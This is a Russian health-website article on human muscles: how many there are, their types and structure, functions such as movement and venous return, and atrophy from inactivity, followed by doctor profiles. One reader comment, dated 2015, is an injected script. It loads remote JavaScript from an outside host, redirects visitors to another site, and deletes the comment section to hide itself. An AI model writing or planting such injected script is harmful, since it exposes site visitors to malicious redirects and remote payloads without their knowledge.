Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ты: инструкция к применен...  >>  Ты: инструкция к применению. Мышцы
 
Обратная связь
 

Ты: инструкция к применению. Мышцы

Размер шрифта
18 марта 2012 10:00
  • google_analytics: false
  • Нравится

Совершая даже простые движения, мы не замечаем, какое большое количество мышц позволяет нам это делать. Из чего состоят наши мышцы и для чего они нужны? Казалось бы, на это есть простые ответы, но не все так просто.

1 

В теле человека более 600 мышц, 25% из которых сосредоточены в области лица и шеи. Поэтому мимика человека так разнообразна, ведь когда мы просто говорим, в работу включается до 100 мышц.

Масса мышц у взрослого человека может доходить до 40 % от массы его тела, при этом они на 86 % состоят из воды.

Совокупность мышц составляет одну из самых важных систем человеческого тела – мышечную систему.

Мышечная ткань настолько важна, что если бы мышцы человека вдруг перестали работать, он не мог бы не только двигаться и говорить, но даже дышать!

Строение

Мышца – орган тела человека, состоящий из ткани, способной сокращаться и расслабляться под влиянием нервных импульсов, что обеспечивает основные функции движения, дыхания, сопротивления нагрузке и т. п., а мышечная ткань, в свою очередь, состоит из отдельных мышечных волокон.

Способность мышц сокращаться – основное их свойство, на котором основана работа всей мышечной системы человека.

Мышцы бывают скелетные, гладкие и особняком стоит сердечная мышца.

  • Скелетные (поперечно-полосатые) мышцы способны произвольно, т.е. по желанию человека, сокращаться. Вместе со скелетом они образуют опорно-двигательную систему человека.
  • Гладкие мышцы состоят из мышечных клеток – миоцитов. Медленные и длительные их сокращения происходят непроизвольно, т.е. независимо от желания человека.

Гладкие мышцы, или мышцы непроизвольных движений, находятся главным образом в стенках полых внутренних органов, таких как пищевод, мочевой пузырь, кровеносные сосуды, дыхательные пути и половые органы. Гладкая мускулатура есть и в радужной оболочке глаза.

  • Есть еще одна разновидность мышц – сердечная поперечнополосатая мышечная ткань, состоящая из кардиомиоцитов. Сокращения сердечной мышцы (миокарда) также не подконтрольны сознанию человека.

Главные функции

  • Движение

Работой всех мышечных тканей управляет нервная система, которая обеспечивает их связь с головным и спинным мозгом. В мышцах происходит превращение химической энергии в механическую энергию и теплоту.

  • Работа вен

Благодаря мышцам кровь в венах перекачивается снизу вверх. Когда человек двигается, мышцы сокращаются, а вместе с ними сокращаются и стенки вен. Таким образом кровь проталкивается вверх и достигает сердца.

  • Снижение веса

В мышцах находятся митохондрии, которые участвуют в сжигании жира. Во время физической нагрузки в мышцах образуются новые митохондрии – настоящие фабрики по переработке жира – благодаря чему скорость его сжигания увеличивается и человек не просто худеет, но и получает возможность не набирать вес в будущем.

Что убивает мышцы

Обездвиженность мышц со временем может привести к их атрофии – уменьшению объема с нарушением функций, что в результате ведет к полной потере их способности выполнять функции.

Что делать

Для того чтобы мышцы были здоровы, нужно побольше двигаться и нагружать их физическими нагрузками в разумных пределах.

Пользуйтесь своими мышцами правильно, и они долго и верно будут служить вам!
 

 
Сюжет по теме:
Ты: инструкция к применению. Мышцы

Тест:
Что вы знаете о мышцах?

Слайдшоу:
Все, что нужно знать о мышцах

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.